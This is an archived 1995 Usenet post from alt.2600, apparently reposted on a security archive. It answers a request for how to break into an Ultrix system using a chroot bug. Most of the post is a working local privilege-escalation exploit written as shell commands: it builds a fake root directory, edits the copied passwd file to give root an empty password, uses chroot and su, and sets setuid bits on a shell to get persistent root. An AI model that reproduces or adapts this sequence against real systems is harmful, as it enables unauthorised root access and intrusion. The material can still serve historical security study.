TUCoPS :: Unix :: Various Flavours :: chrootu.txt

Using the chroot bug to break into an Ultrix system

From will@rainbow.rmii.comThu Nov  2 17:13:57 1995
Date: 24 OCT 1995 17:43:00 -0600 
From: Will Spencer <will@rainbow.rmii.com>
Newsgroups: alt.2600
Subject: Re: chroot 

magni@ALPcom.it (Alessandro Magni) writes:
>How can  I  use the chroot bug to break in in a Ultrix system?
>Found it in CERT files.


% cd $HOME
% mkdir root
% cd root
% mkdir bin etc usr
% cd bin
% cp /bin/sh sh
% cp /bin/su su
% cd ../etc
% cp /etc/passwd.orig passwd
% cp /etc/group group
% cp /bin/chmod chmod
% cp /bin/chown chown
% vi passwd (modify root password to root::0:0, etc...)
% cd ..
% chroot $HOME/root /bin/sh
% su
% chown root /bin/sh
% chmod 2755 /bin/sh
% chmod u+s /bin/sh
% exit
% exit
% $HOME/root/bin/sh
 

-- 
/*  Will Spencer / Voyager        :  The advancement and diffusion  */
/*  Member: TNO, The New Order    :  of knowledge is the only       */
/*  alt.2600/#hack FAQ Editor     :  guardian of true liberty.      */
/*  Writer, poet, hacker, human   :               -- James Madison  */



TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH